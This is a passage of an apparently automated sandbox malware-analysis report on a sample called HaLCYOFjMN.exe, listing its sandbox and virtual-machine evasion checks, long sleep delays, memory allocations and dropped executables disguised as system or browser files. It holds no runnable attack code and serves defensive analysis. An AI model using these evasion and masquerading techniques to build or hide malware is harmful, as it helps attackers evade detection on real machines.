                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Check if machine is in data center or colocation facility
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                    Source: HaLCYOFjMN.exeBinary or memory string: SBIEDLL.DLL%YAVNHDAUQZVHVPFTWT%QPLBY9FRLAFHYUPNWC%WONYWUSOUF57FGFBFX%P0VVRNU4AUPIANBK0P%FNCGDJ2GW6S5FMQB6Z%LDXBJQJQXTLT05CYVA%3W1JAA2IQAS5ZMQZWD%DUKHC2PADSDKKJDTFG%R61FLGIT8DU2T8GAL1%0WHEIPCAEGNANHFXCN%I27LYXQ7ZUDVG22EBT%A1A2ACRUYKPRB2WR0M%GFHRUDMCATSILFJUKL%4RV88MYRHF9NMGPRNL%FKNMVDKN5GO7UGT07EINFO
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: 1A560000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 7D0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A210000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1410000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEMemory allocated: 2730000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEMemory allocated: 1A9C0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 8F0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A390000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 920000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A420000 memory reserve | memory write watch
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMemory allocated: B50000 memory reserve | memory write watch
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMemory allocated: 1A990000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 2360000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 1A540000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 17D0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 1B4B0000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599540Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599204Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598422Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598297Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598187Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597421Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597311Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597134Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597031Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596884Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596760Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596436Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596312Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596200Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596092Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595764Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595547Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595218Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595109Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594890Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594781Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594672Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594562Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594450Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWindow / User API: threadDelayed 2667Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWindow / User API: threadDelayed 7136Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6887Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2868Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7073Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2531Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7882Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7747
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1897
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\MwyHCbxj.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\hLMvsgWt.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Update.exe.exe (copy)Jump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\gOlnWgHy.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\poUkcZma.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\mGNMzMMn.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\nuSUkZIl.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\cXuwPjHF.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjQGfYMX.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Update.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\WfRXmDCR.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\IJgIaehv.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\yaMsqCcN.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\vphcjoRU.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\zXoALCrI.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599703s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599540s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599204s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598968s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598640s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598422s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598297s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598187s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597968s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597640s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597421s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597311s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597134s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597031s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596884s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596760s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596436s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596312s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596200s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596092s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595984s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595875s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595764s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595656s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595547s >= -30000sJump to behavior
